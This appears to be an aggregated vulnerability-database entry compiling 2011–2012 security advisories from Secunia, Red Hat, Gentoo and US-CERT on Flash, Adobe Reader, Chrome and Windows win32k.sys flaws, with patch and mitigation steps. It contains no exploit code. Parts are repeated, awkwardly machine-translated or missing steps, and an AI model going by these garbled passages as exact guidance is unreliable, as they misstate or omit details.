Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, gain knowledge of potentially sensitive information, bypass certain security restrictions, and compromise a user's system

Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)," as exploited in the wild in February 2012. Adobe Flash Player Contains a cross-site scripting vulnerability.By any third party Web Script or HTML May be inserted. An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The product enables viewing of applications, content and video across screens and browsers. Remote attackers can use this vulnerability to inject arbitrary web scripts or HTML with unknown vectors, also known as \"Universal XSS (UXSS)\". -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0144-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html Issue date: 2012-02-17 CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 CVE-2012-0767 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. This update fixes multiple vulnerabilities in Adobe Flash Player. These vulnerabilities are detailed on the Adobe security page APSB12-03, listed in the References section. Multiple security flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially-crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the specially-crafted SWF content. (CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. (CVE-2012-0767) All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 10.3.183.15. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03) 791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0752.html https://www.redhat.com/security/data/cve/CVE-2012-0753.html https://www.redhat.com/security/data/cve/CVE-2012-0754.html https://www.redhat.com/security/data/cve/CVE-2012-0755.html https://www.redhat.com/security/data/cve/CVE-2012-0756.html https://www.redhat.com/security/data/cve/CVE-2012-0767.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-03.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq 2hfvaUbJyuTg8og5n/gSdGc= =7NQZ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48265 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48265/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 RELEASE DATE: 2012-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/48265/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48265/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Google Chrome, where one has an unknown impact and others can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) A use-after-free error exists within v8 element wrapper handling. 2) A use-after-free error exists within SVG value handling. 3) A buffer overflow exists within the Skia drawing library. 4) A use-after-free error exists within SVG document handling. 5) A use-after-free error exists within SVG use handling. 6) A casting error exists within line box handling. 7) A casting error exists within anonymous block splitting. 8) A use-after-free error exists within multi-column handling. 9) A use-after-free error exists within quote handling. 10) An out-of-bounds read error exists within text handling. 11) A use-after-free error exists within class attribute handling. 12) A use-after-free error exists within table section handling. 13) A use-after-free error exists within flexbox with floats handling. 14) A use-after-free error exists within SVG animation elements handling. For more information: SA48033 SOLUTION: Update to version 17.0.963.65. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Chamal de Silva 2, 4, 5, 14) Arthur Gerkis 3) Aki Helin, OUSPG 6, 7, 8, 9, 10, 11, 12, 13) miaubiz ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass intended access restrictions, bypass cross-domain policy, inject arbitrary web script, or obtain sensitive information. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228" References ========== [ 1 ] CVE-2011-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445 [ 2 ] CVE-2011-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450 [ 3 ] CVE-2011-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451 [ 4 ] CVE-2011-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452 [ 5 ] CVE-2011-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453 [ 6 ] CVE-2011-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454 [ 7 ] CVE-2011-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455 [ 8 ] CVE-2011-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456 [ 9 ] CVE-2011-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457 [ 10 ] CVE-2011-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458 [ 11 ] CVE-2011-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459 [ 12 ] CVE-2011-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460 [ 13 ] CVE-2012-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752 [ 14 ] CVE-2012-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753 [ 15 ] CVE-2012-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754 [ 16 ] CVE-2012-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755 [ 17 ] CVE-2012-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756 [ 18 ] CVE-2012-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767 [ 19 ] CVE-2012-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768 [ 20 ] CVE-2012-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769 [ 21 ] CVE-2012-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201204-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to bypass certain security restrictions. 6) An unspecified error can be exploited to bypass certain security restrictions. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, gain knowledge of potentially sensitive information, bypass certain security restrictions, and compromise a user's system

Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. ( Memory corruption ) A state vulnerability exists.Arbitrary code execution or denial of service by a third party ( Memory corruption ) It may be in a state. Adobe Acrobat and Reader are prone to a remote memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. Acrobat is a series of products aimed at enterprises, technicians and creative professionals launched in 1993, making the transmission and collaboration of intelligent documents more flexible, reliable and secure. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: acroread security update Advisory ID: RHSA-2012:0011-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0011.html Issue date: 2012-01-10 CVE Names: CVE-2011-2462 CVE-2011-4369 ===================================================================== 1. Summary: Updated acroread packages that fix two security issues are now available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures: Red Hat Desktop version 4 Extras - i386, x86_64 Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: Adobe Reader allows users to view and print documents in Portable Document Format (PDF). These flaws are detailed on the Adobe security page APSB11-30, listed in the References section. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Package List: Red Hat Enterprise Linux AS version 4 Extras: i386: acroread-9.4.7-1.el4.i386.rpm acroread-plugin-9.4.7-1.el4.i386.rpm x86_64: acroread-9.4.7-1.el4.i386.rpm Red Hat Desktop version 4 Extras: i386: acroread-9.4.7-1.el4.i386.rpm acroread-plugin-9.4.7-1.el4.i386.rpm x86_64: acroread-9.4.7-1.el4.i386.rpm Red Hat Enterprise Linux ES version 4 Extras: i386: acroread-9.4.7-1.el4.i386.rpm acroread-plugin-9.4.7-1.el4.i386.rpm x86_64: acroread-9.4.7-1.el4.i386.rpm Red Hat Enterprise Linux WS version 4 Extras: i386: acroread-9.4.7-1.el4.i386.rpm acroread-plugin-9.4.7-1.el4.i386.rpm x86_64: acroread-9.4.7-1.el4.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: acroread-9.4.7-1.el5.i386.rpm acroread-plugin-9.4.7-1.el5.i386.rpm x86_64: acroread-9.4.7-1.el5.i386.rpm acroread-plugin-9.4.7-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: acroread-9.4.7-1.el5.i386.rpm acroread-plugin-9.4.7-1.el5.i386.rpm x86_64: acroread-9.4.7-1.el5.i386.rpm acroread-plugin-9.4.7-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: acroread-9.4.7-1.el6.i686.rpm acroread-plugin-9.4.7-1.el6.i686.rpm x86_64: acroread-9.4.7-1.el6.i686.rpm acroread-plugin-9.4.7-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: acroread-9.4.7-1.el6.i686.rpm acroread-plugin-9.4.7-1.el6.i686.rpm x86_64: acroread-9.4.7-1.el6.i686.rpm acroread-plugin-9.4.7-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: acroread-9.4.7-1.el6.i686.rpm acroread-plugin-9.4.7-1.el6.i686.rpm x86_64: acroread-9.4.7-1.el6.i686.rpm acroread-plugin-9.4.7-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-2462.html https://www.redhat.com/security/data/cve/CVE-2011-4369.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb11-30.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . I. Description Adobe Security Bulletin APSB11-30 and Adobe Security Advisory APSA11-04 describe a number of vulnerabilities affecting Adobe Reader and Acrobat. These vulnerabilities affect Reader and Acrobat 9.4.6 and earlier 9.x versions. These vulnerabilities also affect Reader X and Acrobat X 10.1.1 and earlier 10.x versions. An attacker could exploit these vulnerabilities by convincing a user to open a specially crafted PDF file. The Adobe Reader browser plug-in, which can automatically open PDF documents hosted on a website, is available for multiple web browsers and operating systems. Adobe Reader X and Adobe Acrobat X will be patched in the next quarterly update scheduled for January 10, 2012. II. Impact These vulnerabilities could allow a remote attacker to execute arbitrary code, write arbitrary files or folders to the file system, escalate local privileges, or cause a denial of service on an affected system as the result of a user opening a malicious PDF file. III. Solution Update Reader Adobe has released updates to address this issue. Users are encouraged to read Adobe Security Bulletin APSB11-30 and update vulnerable versions of Adobe Reader and Acrobat. In addition to updating, please consider the following mitigations. Disable Flash in Adobe Reader and Acrobat Disabling Flash in Adobe Reader will mitigate attacks that rely on Flash content embedded in a PDF file. Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results in a more user-friendly error message instead of a crash. To disable Flash and 3D & Multimedia support in Adobe Reader 9, delete, rename, or remove access to these files: Microsoft Windows "%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll" "%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll" Apple Mac OS X "/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle" "/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework" GNU/Linux (locations may vary among distributions) "/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so" "/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so" File locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plugins will reduce functionality and will not protect against Flash content that is hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. Acrobat JavaScript can be disabled using the Preferences menu (Edit -> Preferences -> JavaScript; uncheck Enable Acrobat JavaScript). Adobe provides a framework to blacklist specific JavaScipt APIs. If JavaScript must be enabled, this framework may be useful when specific APIs are known to be vulnerable or used in attacks. Prevent Internet Explorer from automatically opening PDF files The installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to a safer option that prompts the user by importing the following as a .REG file: Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\AcroExch.Document.7] "EditFlags"=hex:00,00,00,00 Disable the display of PDF files in the web browser Preventing PDF files from opening inside a web browser will partially mitigate this vulnerability. If this workaround is applied, it may also mitigate future vulnerabilities. To prevent PDF files from automatically being opened in a web browser, do the following: 1. 2. Open the Edit menu. 3. Choose the Preferences option. 4. Choose the Internet section. 5. Uncheck the "Display PDF in browser" checkbox. PDF documents that use the PRC format for 3D content will continue to function on Windows and Linux platforms. To disable U3D support in Adobe Reader 9 on Microsoft Windows, delete or rename this file: "%ProgramFiles%\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d" For Apple Mac OS X, delete or rename this directory: "/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework" For GNU/Linux, delete or rename this file (locations may vary among distributions): "/opt/Adobe/Reader9/Reader/intellinux/plug_ins3d/3difr.x3d" File locations may be different for Adobe Acrobat or other Adobe products or versions. Do not access PDF files from untrusted sources Do not open unfamiliar or unexpected PDF files, particularly those hosted on websites or delivered as email attachments. Please see Cyber Security Tip ST04-010. IV. Please send email to <cert@cert.org> with "TA11-350A Feedback VU#759307" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2011 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History December 16, 2011: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBTuuZnz/GkGVXE7GMAQIN8ggAjjQO8LOasl98uasGZW2J5SHfkKr675Mf ymRzBagFqO9QuId2RvFG2b9nuq5zdqETsrcG1t668wtYLUhBaoLmFXPe/KsDQ9n+ /p9PctVJFmJpV92S3kAHw+u4t1n/Aa/4IdK0oXNBDhkyXrp41F27LY+aQ8FWWuxZ lL4jXSUQ/gLgb6hOhLjRCsQtEhAcPbX/mPNxl6bACXZaOVZT88fz9M7JXryDiJWO uuFi3O2GT0Bd3fEsL57U/TSbq8SynadObMSj4/+Q1HmOHcD0L5gzd9/N4M3D1Emg y7aeUpgycY5eFefY3LVVkb7JkTUbEZHbuNHydFKIJDRlaXBAo+D0QQ== =rKM4 -----END PGP SIGNATURE-----

The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability.". Microsoft Windows 7 Professional 64-bit of kernel-mode Driver win32k.sys Is Apple Safari Service disruption when using ( Memory corruption ) A vulnerability exists that could lead to state and arbitrary code execution.By a third party IFRAME Excessively large height Service operation disruption via attributes ( Memory corruption ) Could be put into a state and execute arbitrary code. Microsoft Windows is prone to a remote memory-corruption vulnerability. Successful exploits will result in the execution of arbitrary code in the kernel-mode. Failed attempts will cause a denial-of-service condition. ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Microsoft Windows win32k.sys Memory Corruption Vulnerability SECUNIA ADVISORY ID: SA47237 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47237/ Customer Area (Credentials Required) 